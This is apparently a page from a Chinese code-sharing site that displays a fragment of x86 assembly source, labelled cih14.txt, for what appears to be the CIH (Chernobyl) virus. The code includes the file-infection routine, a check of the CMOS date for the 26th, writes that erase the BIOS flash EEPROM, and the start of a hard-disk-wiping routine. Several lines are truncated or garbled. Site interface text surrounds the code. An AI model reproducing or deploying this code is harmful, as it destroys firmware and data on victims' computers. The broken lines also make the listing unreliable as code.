📄 cih14.txt
字号:
lea eax, (LastVxDCallAddress-2-@9)[esi]
mov cl, VxDCallTableSize
LoopOfRestoreVxDCallID:
mov word ptr [eax], 20cdh
mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]
mov [eax+2], edx
movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[es
sub eax, edx
loop LoopOfRestoreVxDCallID
WriteVirusCodeToFile:
mov eax, dr1
mov ebx, [eax+10h]
mov edi, [eax]
LoopOfWriteVirusCodeToFile:
pop ecx
jecxz SetFileModificationMark
mov esi, ecx
mov eax, 0d601h
pop edx
pop ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO
jmp LoopOfWriteVirusCodeToFile
SetFileModificationMark:
pop ebx
pop eax
stc ; Enable CF(Carry Flag)
pushf
CloseFile:
xor eax, eax
mov ah, 0d7h
call edi ; VXDCall IFSMgr_Ring0_FileIO
popf
pop esi
jnc IsKillComputer
mov ebx, edi
mov ax, 4303h
mov ecx, (FileModificationTime-@7)[esi]
mov edi, (FileModificationTime+2-@7)[esi]
call ebx ; VXDCall IFSMgr_Ring0_FileIO
DisableOnBusy:
dec byte ptr (OnBusy-@7)[esi] ; Disable OnBus
prevhook:
popad
popad
ret
IsKillComputer:
; Get Now Day from BIOS CMOS
mov al, 07h
out 70h, al
in al, 71h
xor al, 26h ; ??/26/????
IF DEBUG
jmp DisableOnBusy
ELSE
jnz DisableOnBusy
ENDIF
mov bp, 0cf8h
lea esi, IOForEEPROM-@7[esi]
mov edi, 8000384ch
mov dx, 0cfeh
cli
call esi
mov di, 0058h
dec edx ; and a
0fh
mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h
call esi
lea ebx, EnableEEPROMToWrite-@10[esi]
mov eax, 0e5555h
mov ecx, 0e2aaah
call ebx
mov byte ptr [eax], 60h
push ecx
loop $
xor ah, ah
mov [eax], al
xchg ecx, eax
loop $
mov eax, 0f5555h
pop ecx
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h
loop $
mov ah, 0e0h
mov [eax], al
; or al
0h
mov word ptr (BooleanCalculateCode-@10)[esi], 100ch
call esi
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDisk⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -